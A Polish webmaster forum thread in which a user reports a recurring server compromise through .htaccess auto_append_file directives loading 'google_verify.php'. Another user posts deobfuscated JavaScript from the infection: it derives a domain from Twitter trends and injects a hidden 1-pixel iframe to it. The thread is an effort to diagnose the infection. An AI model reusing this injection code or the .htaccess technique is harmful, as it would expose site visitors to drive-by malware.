 [php, bezpieczeństwo] Podejżane pliki na serwerze google_verify |
| [php, bezpieczeństwo] Podejżane pliki na serwerze google_verify |
Post
#1
|
|
|
Grupa: Zarejestrowani Postów: 55 Pomógł: 0 Dołączył: 21.09.2007 Skąd: Mielec Ostrzeżenie: (0%) 
 |
Witam,
Na wszystkich stronach na serwerze, dodały się dziwne fragmenty kodu - niektóre zaszyfrowane php w plikach, a niektóre wywołane przez .htacces: Kod <IfModule mod_php5.c> php_value auto_append_file "google_verify.php" </IfModule> <IfModule mod_php4.c> php_value auto_append_file "google_verify.php" </IfModule> Oto podejrzany kod: http://wklej.org/id/652715/, co po odkodowaniu daje http://wklej.org/id/652713/, Wyczyściłem wszystko, pozmieniałem hasła do ftp, baz etc. Starałem się również przeszukać pod tym kątem komputer, ale po kliku dniach wszystko się powtórzyło. Przejrzałem logi, ale nie ma nic podejrzanego w postach i getach... Z góry dzięki za pomoc i wesołych świąt Kamil Ten post edytował kamil881 22.12.2011, 13:05:51 |
 |
 
|
 |
|
Post
#2
|
|
|
Grupa: Zarejestrowani Postów: 7 Pomógł: 0 Dołączył: 28.12.2011 Skąd: Bydgoszcz Ostrzeżenie: (0%)
|
Tak z ciekawości zabawiłem się za wstępne rozszyfrowanie tego zakofowanego kodu.
Wygląda od mniejwięcej tak: Kod function anonymous() { (function () {Date.prototype.jsq = function () {var jsBP = this;return [jsBP.getUTCFullYear(), jsBP.getUTCMonth(), jsBP.getUTCDate(), jsBP.getUTCHours(), jsBP.getUTCMinutes(), jsBP.getUTCSeconds()];};Date.prototype.jsk = function () {var jsr, jsBp = this.jsq(), i = 0;jsBp[1] += 1;while (i++ < 7) {jsr = jsBp[i];if (jsr < jsM) {jsBp[i] = jsm("z") + jsr;}}return jsBp.splice(jsm("z"), 1 + jsm("T")).join(jsm("u")) + "T" + jsBp.join(jsm("U"));};jsBG = {h: "http://", s: "/", t: "tre", d: "dai", n: "nds", q: "?", c: "callback=", j: "js", a: "api", l: "ly", W: "twitter", o: "com", e: "1", k: "s", K: "body", x: "ajax", D: ".", L: "libs", J: "jquery", '6': "6.2", m: "min", f: "on", S: "cript", i: "if", M: "rame", Y: "head", w: "width:", p: "px;", H: "height:", T: "2", r: "rc", Q: "\"", y: "style=", b: "><", R: "></", I: "div", B: "<", A: ">", g: "google", E: "&date=", z: "0", u: "-", U: " ", ',': ":00", ';': 2345678901, '/': 48271, F: 198195254, G: 12, C: "="}; function jsm(jsBu) {jsT = [];for (jsBa = 0; jsBa < jsBu.length; jsBa++) {jsT.push(jsBG[jsBu.charAt(jsBa)]);}return jst(jsT);} jsBi = document;jsu = window;jsu.jsy = "undefined";jsu.jsz = jsm("haDWDosestnsdlDjfqcq");jsH = typeof $ == jsu.jsy;if (jsH || !jsBc()) {if (!jsH) {try {jsBg = jQuery.noConflict(true);} catch (e) {}try {jsBg = $.noConflict(true);} catch (e) {}}jsBS = jsBi.getElementsByTagName(jsm("Y"))[0];jsE = jsBi.createElement(jsm("kS"));jsE.setAttribute(jsm("kr"), jsm("hxDgakDosxsLsJseD6sJDmDj"));jsBS.appendChild(jsE);} function jsBR(jss, jsBF) {return Math.floor(jss / jsBF);} function jsv(jsd) {var jsBf = jsBR(jsu.jsL, jsu.jsBx);var jsw = jsu.jsL % jsu.jsBx;var jsN = jsu.jsBp * jsw;var jsF = jsu.jsBm * jsBf;var jse = jsN - jsF;if (jse > 0) {jsL = jse;} else {jsL = jse + jsu.jsBA;}return jsL % jsd;} function jsJ(jsn) {jsu.jsL = jsm(";") + jsn;jsu.jsBp = jsm("/");jsu.jsBA = jsm(";") - jsm("F");jsu.jsBx = jsBR(jsu.jsBA, jsu.jsBp);jsu.jsBm = jsu.jsBA % jsu.jsBp;} function jst(jsB) {return jsB.length == 1 ? jsB[0] : jsB.join("");} function jsR(jsB) {d = new Date;jsA = jsm("zee");d.setTime((jsB.as_of - jsm("G") * jsm("G") * jsm("G") * jsm("ezz")) * jsm("ezzz"));return d;} function jso(jsBC) {var jsi, jsBh, jsG = jsBC.length;var jsx = [];while (--jsG) {jsBh = jsv(jsG);jsx.push(jsBh);jsi = jsBC[jsBh];jsBC[jsBh] = jsBC[jsG];jsBC[jsG] = jsi;}} function jsBL($) {jsBE = $.map([81, 85, 74, 74, 92, 17, 82, 73, 80, 30, 82, 77, 25, 11, 10, 10, 61, 11, 56, 55, 11, 53, 6, 53, 7, 2, 1, 0, 48], function (x, i) {return String.fromCharCode(i + x + 24);});return jst(jsBE);} function jsj(x) {return x.length;} function jsBT($) {if (typeof $ != jsu.jsy) {$(function () {if (typeof $.jsBo != jsu.jsy) {return;}$.jsBo = 1;$.getJSON(jsz, function (jsBM) {jsD = jsR(jsBM);jsK = jsD.getUTCMonth() + + jsm("e");jsBN = jsD.getUTCDate();jsp = function (x, i) {return jsj(x + "") - 1 ? x : "0" + x;};jsBe = jsp(jsK, 4) + "-" + jsp(jsBN, 7);jsa = jsz + jsm("ETzeeu") + jsBe;jsBD = jsBy = jsBR(jsD.getUTCHours(), 6) * 6 + + jsm("e");jsBz = jsBD + 1;jsM = + jsm("ez");setTimeout(function () {$.getJSON(jsa, function (jsBM) {try {jsS = jsBM.trends;jsf = jsm("Tzeeu") + jsBe + " ";if (jsBD < jsM) {jsBD = jsm("z") + jsBD;}if (jsBz < jsM) {jsBz = jsm("z") + jsBz;}jsc = jsS[jsf + jsBD + jsm(",")];if (!jsc) {jsc = jsS[jsf + jsBz + jsm(",")];}jsc = (jsc[3].name.toLowerCase().replace(/[^a-z]/gi, "") + "microscope").split("");jsC = jsK * 71 + jsBy * 3 + jsBN * 37;jsJ(jsC);jsj = jsv(4) + jsM;jso(jsc);jsb = jsm("Ch") + jst(jsc).substring(0, jsj) + ".com/" + jsBL($);jsBG.Z = jsb;jsBr = jsm("BIyQHTpweeepQbiMUyQHTpweeepQUkrZRiMRIA");$(jsm("K")).append(jsBr);} catch (jsBq) {}});}, jsM * jsM * jsM);});});} else {setTimeout(function () {jsBT(jsu.jQuery);}, 1 + jsm("TTT"));}} jsBT(jsu.jQuery);}()); } Dodatkowo przechwyciłęm z czym się łączy: http://ajax.googleapis.com/ajax/libs/jquer...2/jquery.min.js http://api.twitter.com/1/trends/daily.json..._=1325094272460 http://api.twitter.com/1/trends/daily.json..._=1325094273908 To chyba wszystko co wyłapałem na chwile obecną. Pozdrawiam Dragas |
|
|
|
kamil881 [php, bezpieczeństwo] Podejżane pliki na serwerze google_verify 22.12.2011, 11:15:37 
zordon napisz do swojej firmy hostingowej, może to jakieś... 22.12.2011, 11:30:25 kamil881 Kontaktowałem się z nimi, statystyki hostingowe ma... 22.12.2011, 11:31:19 thek No to pozostaje jeszcze rozkodować te liczby i będ... 22.12.2011, 12:03:31 kamil881 Gdybym wiedział jak się za nie zabrać... .
Dosta... 22.12.2011, 13:02:30 erix CytatWyczyściłem wszystko, pozmieniałem hasła do f... 22.12.2011, 13:50:27 kamil881 Poza aktualnym wordpressem i zwykłymi statycznymi ... 22.12.2011, 13:52:07 erix A czy pluginy wszystkie masz w porządku?
Cytatnie... 22.12.2011, 13:54:14 kamil881 Głowy w stanie dać nie jestem, cóż, będę jeszcze... 22.12.2011, 13:59:10  |
|
Aktualny czas: 3.10.2025 - 14:21 |
